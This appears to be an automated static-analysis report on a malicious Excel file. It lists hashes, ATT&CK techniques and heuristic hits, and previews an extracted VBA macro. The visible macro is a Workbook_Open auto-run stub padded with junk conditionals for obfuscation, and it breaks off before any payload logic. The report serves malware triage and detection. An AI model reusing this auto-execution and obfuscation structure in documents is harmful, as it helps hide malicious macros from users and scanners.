Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 23f4ba794a849325…

MALICIOUS

Office (OOXML)

43.9 KB Created: 2018-10-22 22:41:12 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2020-02-04
MD5: 754b5bb8ba6f2aae2ce1b7f3bfc9e070 SHA-1: bcc5876e6ad350ffc8df2d5851da66874dbf10aa SHA-256: 23f4ba794a84932507fe35520e2693f26558be6371f2eb42b75e439b1cba548e
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Excel document containing a Workbook_Open macro. This macro is designed to execute obfuscated VBA code, which likely attempts to download and execute a second-stage payload. The presence of a Workbook_Open macro and the use of CreateObject are strong indicators of malicious intent, commonly seen in macro-based malware delivery.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 26392 bytes
SHA-256: 23e1d8f362256b1a45ddad84d95874327df344999e42d3cde8e4866935401712
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()


JFoCUnukWicxrukTg.XwNyDABQTklaWyUqBYdR
If "bVZAtT" = "czeccgHZqfvKFImgaojDpBcFwzXgWBXMFkYBmqIFSxHovrT" Then
Dim UeuulRqeaXZgcIbCoHi As Byte
ElseIf "FUkkujgekrtoJEgCBbGlvOGxeMKfwruTgNmykuALFmFmhjPbvGZbh" = "VmqOnGhZAhtwaHwShSHavgIJTQvwikqSSlKav" Then
Dim kxnTlFFMqHbTINnRBlpeguWLkrQrado
End If
If "wVWxVUG" = "KbDxdJTdZWCBRAVvPpabjuoNlMSfxlQRwv" Then
Dim bNajRNsHRuoZMoaZHH As Byte
ElseIf "vsXQmqLQqnfnFlEWYHVfYMjbcuYLAeEXdJWEXLakYAXEcdoDVqPSEcijI" = "vnrRzQLiHJwOzyNgkGXpezzGVqKPmSBanvbXjTYkLWUTsoVrBlUV" Then
Dim LtewolwJFvwoIWbEWqxQindIefOgUSOAyfPtRfjx
End If
If "XOfQZg" = "LVNRULnEnXQVRIXPpmhwqdHimrGAsTINjyUsTCyDMtsrcwNaZIZ" Then
Dim sidqiOeedEnLTPDlTo As Byte
ElseIf "ewmodjwlQFqefakuPeGHmeoXVyZiYbYKtmvLmDFtuwyYoyZMaZAZfLCAHO" = "TfKNNohfktfYHMZMNpgPjWZMIybzfikuEYkaigjJrIOgh" Then
Dim BSnASxMUrexFyFONhACIkUibzdhFXYbHteGf
End If
If "nzMkXaNt" = "mUkaVvKHMXwhjLApQHwTDpLTzjaioRkJHpoet" Then
Dim GkcOTvWiZvbyWUQetpxIRblUcT As Byte
ElseIf "ummZuXWwJXUFjtplanzjRxUfNzrVbfyHlAAjvzBEcaKtJ" = "oFDTgByVsBxRHMufAUdYNTjsGpalvGrmbWZunCvdAmtzDRo" Then
Dim mHYbGhUwVWKMqaMalKKqknAsyYzYaakooBoeWfkFGZE
End If
If "XcpFDnLH" = "otbDzHgdhhwVulWYomhDGZEkLjcPITwkPTvvNyoXq" Then
Dim BDYKEJlGRQRFIAP As Byte
ElseIf "orsQeQVNkLGbqaLqxKNFVgZGZqJrDffGSgGWGYsZfp" = "nyxhvfGZTvuutHRlqoHeKFgzIJTokZRnZ" Then
Dim gtbIsudldMkLYnzFUhERBfiSyYmLRotdH
End If


If "UNOpcxte" = "sgswokWUjQsNWXAKIKTIRToSGEDZkPrjLnIzpVKoPriYBQkx" Then
Dim MDgSekMZrZpjgwkTYIBiOBVn As Byte
ElseIf "AfsalPRqTGMgiZFaajIPgaHSGOAsOCiLit" = "RyrmobIzPakElyDbHfsGGZXaTWPZbRYAxoHGinvgHgKhiCdBpnu" Then
Dim DTcmraRTRMiXyCjGwrwsTjMyaPqsQtNjoWVhVBPfRUeUYIMeywhKsvaTG
End If
If "dMcjZCYyz" = "jchBkubQbzFraRDMtUMCqtvBasomvrSGWZZjxwLmjbTbNPCvZXfh" Then
Dim LwIqgfasFoVjgzVBrTOwIZ As Byte
ElseIf "TOZUnLptMXLkuaRiDSVThuGkvOtBEGJjZmctRMrPCMbxXvFvkJQvaosYIo" = "YZSnpGOcLHxYQqbGQUTJNzJyRuqNIkuElcnRwP" Then
Dim XViujxyMsZUUYXEybZQTVuPBUbNsmoDJJBxxaSPMzFCRtoMWzmBOBct
End If
If "cFhaHj" = "FZEWKKWZHXJJEUQsyHfPqsAmoHgHUrtrIctgyuidpxsOrExIdkHZvstNY" Then
Dim RhCdPEPeRBbajtDZBat As Byte
ElseIf "zlujKXdkkTwPjgIgNfzZsdkaDViuqEztRzOnWxsGlUeKVlstb" = "NpuBAAVAUgoojtgTDxjSUKPmtoYyZERdp" Then
Dim TdOFrRzsmBRERCayrSnJbGCaIILcWbQOLzQPROLgkZi
End If
If "IyhcmxAim" = "eUNMbnwjFWVKlDtRlLgdGHYCXucafZeWtdkrmDo" Then
Dim dRcbNDXWuoLAmTFgXvLo As Byte
ElseIf "gLWDfszRITCeiWCLdfLyAXhlUYsCoxMvbPHSuYvVEFObmgSPR" = "tCrkMoJekjHzxdKGGDTPkQEkptuIFzoGcl" Then
Dim uuVLOaynKpoVHcDVfczAgcxGuStAYlvAXLjQkvpsRw
End If
If "GPwTmSFkT" = "LGcESxOQvhxPYtnyvtnkkmHjkViKbgavoRjtvHQSVfuK" Then
Dim ThiVJVrZRzjYzsU As Byte
ElseIf "wOEpPGBaGJtDocUOFswPCnMBFpBdpiLuCmUERqfDRHbLPRCxwkefCc" = "RIBDjZFXkXyyBCHQxPNsyvLBlomDhFEf" Then
Dim rZULCNGFytWDMQQAqgmPSJeVwASunBqfTTHbhvNkIIuEZHoUXmNASpM
End If


End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "JFoCUnukWicxrukTg"

Sub XwNyDABQTklaWyUqBYdR()

 On Error Resume Next
If "rXeoxDD" = "DOGckxSlFzfrBajpzfDtxaHbyEMJMIKMwFSZeYCueVSQJWYZH" Then
Dim ifItJFdGedglIZwpS As Byte
ElseIf "uvHKKacJPcHrScfmBddBTmzpTzuWJVw" = "VbqbdSxXEfkudVOMBAyHvTnzHwSrKgGAtgmQbA" Then
Dim CUEGYVisWTEnsVKOACnqUgzGMYYjAwjykBydCouSROZymXnl
End If
If "pffjdlg" = "VUxtAwysZkFDrWhLMHUZFHBTpknuURzVyVcIEutVSVANhTwOIUTbI" Then
Dim LaOTeEQJEYHkjEWuYGROyHjGnm As Byte
ElseIf "VnYlAyXNmuOpaqcMNxscxPaUjNBNJEr" = "IfrjclSYJMWRcfjfblmtlNLoGNDBmwKDiCGJiHAbuZj" Then
Dim PaxxpAhacWKFuUDcOhQlNCTjZZZxTlLyMevO
End If
If "JQOBEV" = "igXwLpfeltdnWNHNXPakHqLMtQZoTyTPhrUmL" Then
Dim dN
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 71680 bytes
SHA-256: 1fd6609a7f3ff3a484e05253cf22361396619bccc1407de7fad90be90763f91d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 long base64-like blob(s).